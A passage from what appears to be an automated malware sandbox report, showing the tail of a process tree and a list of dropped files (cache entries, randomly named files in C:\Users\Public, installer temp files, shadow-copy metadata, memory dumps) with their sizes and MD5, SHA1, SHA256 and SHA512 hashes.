                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                                                                          5⤵
                                                                                            PID:5140
                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                    C:\Windows\system32\vssvc.exe
                                                                                    1⤵
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4960
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:240

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v6

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF

                                                                                      Filesize

                                                                                      746B

                                                                                      MD5

                                                                                      81d472a05cedae0cc51da78438bf403f

                                                                                      SHA1

                                                                                      2d03defd282a5e467fbaab00e3be5b23487c053b

                                                                                      SHA256

                                                                                      152402a3153cf9f7d2d3d9bc4fef13a582cd6ce98e5a18905a11d897fe7a9578

                                                                                      SHA512

                                                                                      6c37ad45e6b24077dc765a75ec141e676c4ca272a81643f6050dc8fb8665cab10899d4053c487df2b549fa3e84284765105dacee73fb974efabdf3e117ad236c

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                      Filesize

                                                                                      727B

                                                                                      MD5

                                                                                      99accff20ca7c832511f27c37d003496

                                                                                      SHA1

                                                                                      3533a08c5b884a8a905afb21fbf3b677e0f9b8f1

                                                                                      SHA256

                                                                                      af120cebcf520528b95823f7648a2819cc33152235c9bb7f6ab3f1de22b91de9

                                                                                      SHA512

                                                                                      4a6b09b06932b470d55006f2789df9b0cbc00fd5696b25c0db0c8c2aca2ffebea1a2eb896ff0d24e1904b190e721f6e8ed93816c205d95a9ec9eda5fdbe1007b

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF

                                                                                      Filesize

                                                                                      408B

                                                                                      MD5

                                                                                      4bc233662a20ece5c8e0f9f60f034706

                                                                                      SHA1

                                                                                      66ce9b4d9979cdfa16f9b3e9723481c808fd7546

                                                                                      SHA256

                                                                                      882cb3cb900a9a6c2f4418960478051c1da22b5d59133645b0a9137ac9a0af3b

                                                                                      SHA512

                                                                                      5872542b517c366280309f43d9a154e3a108b287f6073e2d569bb16037f612073187ef945bd591b47244e4e8de7d0d96e475353ff92a9f3f732247c3925a4202

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                      Filesize

                                                                                      412B

                                                                                      MD5

                                                                                      ff9d392d9e2cfff9dc93a21843f56561

                                                                                      SHA1

                                                                                      a225ce6da6da80602d8ce3f940e19a72e2186a2b

                                                                                      SHA256

                                                                                      234b2a4590d9d1e854add2e055373aa4611643a35a52e6fab686485762c27333

                                                                                      SHA512

                                                                                      4fd0030db2f71ebba7d4b9af6ccd58019656a03b8c94ca458dbe7283374ae46b6313ae8576db08b3491c0e7acd4ffaeec10ceffbd4fa4cf30d8a8ca98b0fcade

                                                                                    • C:\Users\Public\bjsocea

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      49eac8d576681efe19b67231c07795a0

                                                                                      SHA1

                                                                                      9cd795e11c3078efdd008091f18e86b325f8f892

                                                                                      SHA256

                                                                                      331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

                                                                                      SHA512

                                                                                      899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

                                                                                    • C:\Users\Public\bjsocea

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      49eac8d576681efe19b67231c07795a0

                                                                                      SHA1

                                                                                      9cd795e11c3078efdd008091f18e86b325f8f892

                                                                                      SHA256

                                                                                      331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

                                                                                      SHA512

                                                                                      899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

                                                                                    • C:\Users\Public\bjsocea

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      49eac8d576681efe19b67231c07795a0

                                                                                      SHA1

                                                                                      9cd795e11c3078efdd008091f18e86b325f8f892

                                                                                      SHA256

                                                                                      331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

                                                                                      SHA512

                                                                                      899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

                                                                                    • C:\Users\Public\w8q31a55

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      d4187737377edd4a5fddf9ee201f8bfb

                                                                                      SHA1

                                                                                      ef8c59d456c2a880fbeaac060629d5060dad072e

                                                                                      SHA256

                                                                                      0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

                                                                                      SHA512

                                                                                      a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

                                                                                    • C:\Users\Public\w8q31a55

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      d4187737377edd4a5fddf9ee201f8bfb

                                                                                      SHA1

                                                                                      ef8c59d456c2a880fbeaac060629d5060dad072e

                                                                                      SHA256

                                                                                      0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

                                                                                      SHA512

                                                                                      a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

                                                                                    • C:\Users\Public\w8q31a55

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      d4187737377edd4a5fddf9ee201f8bfb

                                                                                      SHA1

                                                                                      ef8c59d456c2a880fbeaac060629d5060dad072e

                                                                                      SHA256

                                                                                      0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

                                                                                      SHA512

                                                                                      a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

                                                                                    • C:\Windows\Installer\MSID7E6.tmp

                                                                                      Filesize

                                                                                      50KB

                                                                                      MD5

                                                                                      19fa3be964d43ee5eaddb1198cb34cfa

                                                                                      SHA1

                                                                                      08214c36b827979ff393daf669709e516b305e49

                                                                                      SHA256

                                                                                      d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373

                                                                                      SHA512

                                                                                      7c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738

                                                                                    • C:\Windows\Installer\MSID7E6.tmp

                                                                                      Filesize

                                                                                      50KB

                                                                                      MD5

                                                                                      19fa3be964d43ee5eaddb1198cb34cfa

                                                                                      SHA1

                                                                                      08214c36b827979ff393daf669709e516b305e49

                                                                                      SHA256

                                                                                      d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373

                                                                                      SHA512

                                                                                      7c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738

                                                                                    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                                                                                      Filesize

                                                                                      18.5MB

                                                                                      MD5

                                                                                      c864145fe5179f9ba2cf23c9a1a8f015

                                                                                      SHA1

                                                                                      72cc399cae75f9f82e15cce6d5328bd96fe9176a

                                                                                      SHA256

                                                                                      667a209e97f3b043edab5b3b683a819fd0e73aa8025738921c5b0b77bca841a3

                                                                                      SHA512

                                                                                      35876624040e1c7929a0330a31c07400cdcb9fa6e0657b3c67026dc5143b5c3ff040663f48cd516da20024a66a5f0250f5783aa138441b62be897cb3cdcde410

                                                                                    • \??\Volume{06969d78-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{40e1b798-992f-4eab-99b6-1644298cd675}_OnDiskSnapshotProp

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      edbc93e85544b92d4ba07dadf3fbee93

                                                                                      SHA1

                                                                                      4193b8c9f6ae94e22a6d24295fe63667e330cfcb

                                                                                      SHA256

                                                                                      1f521c13c9bca82e130c9db45fe4c1226ecf2bb8a56345bf5484637b9da90ef4

                                                                                      SHA512

                                                                                      e2e6474a73c4fd45b7334d82447479932488cddf64df2cc64e0f5bab6fd6130b376b82837881b5ca742c76d2142d0c2f94a0d2a73adc3e3ecbc15fbc3e0c1f1e

                                                                                    • memory/1928-148-0x000001ADDF6E0000-0x000001ADDF6EC000-memory.dmp

                                                                                      Filesize

                                                                                      48KB

                                                                                    • memory/2408-149-0x000001D172BC0000-0x000001D172BC3000-memory.dmp

                                                                                      Filesize

                                                                                      12KB